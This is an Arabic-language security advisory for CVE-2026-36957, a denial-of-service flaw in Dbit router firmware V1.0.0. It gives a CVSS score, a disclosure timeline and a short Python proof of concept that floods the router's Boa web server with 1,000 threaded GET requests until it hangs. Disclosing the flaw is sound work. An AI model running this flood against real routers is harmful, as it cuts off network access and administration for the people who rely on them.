
إثبات المفهوم لـ CVE-2026-36957، وهي ثغرة حرمان من الخدمة في البرنامج الثابت لموجّه Dbit عبر فيضان HTTP على خادم الويب Boa، مما يسبب استنزاف الموارد وتعليق النظام.
معرف CVE: CVE-2026-36957 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: شركة Shenzhen Dibit Network Equipment Co., Ltd. المنتج: راوتر Dbit إصدار البرنامج الثابت: V1.0.0 CWE: CWE-400 - استهلاك غير متحكم فيه للموارد
البرنامج الثابت V1.0.0 لراوتر Dbit عرضة لرفض الخدمة عبر معالج URI لخادم الويب Boa. من خلال إرسال فيضان عالي الحجم من طلبات HTTP GET إلى URIs غير موجودة، يمكن للمهاجم استنزاف موارد النظام الحرجة بما في ذلك واصفات الملفات ومخازن الذاكرة المؤقتة. يؤدي هذا إلى توقف النواة أو تعليق النظام يعطل بوابة الإدارة عبر الويب وجميع قدرات التوجيه.
درجة CVSS v3.1: 7.5 (عالية)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| المقياس | القيمة |
|---|
| ناقل الهجوم | الشبكة |
| تعقيد الهجوم | منخفض |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| تأثير السرية | لا شيء |
| تأثير التكامل | لا شيء |
| تأثير التوافر | عالي |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
السلوك المتوقع: يجب أن يحد الخادم من الاتصالات ويبقى مستقرًا. السلوك الفعلي: تصبح واجهة الويب للراوتر غير مستجيبة؛ ويتطلب إعادة تشغيل يدوية.
| التاريخ | الحدث |
|---|---|
| 2026-04-29 | اكتشاف الثغرة |
| 2026-04-29 | الإبلاغ إلى MITRE |
| 2026-04-29 | تعيين CVE-2026-36957 |
| 2026-04-29 | الإفصاح العام |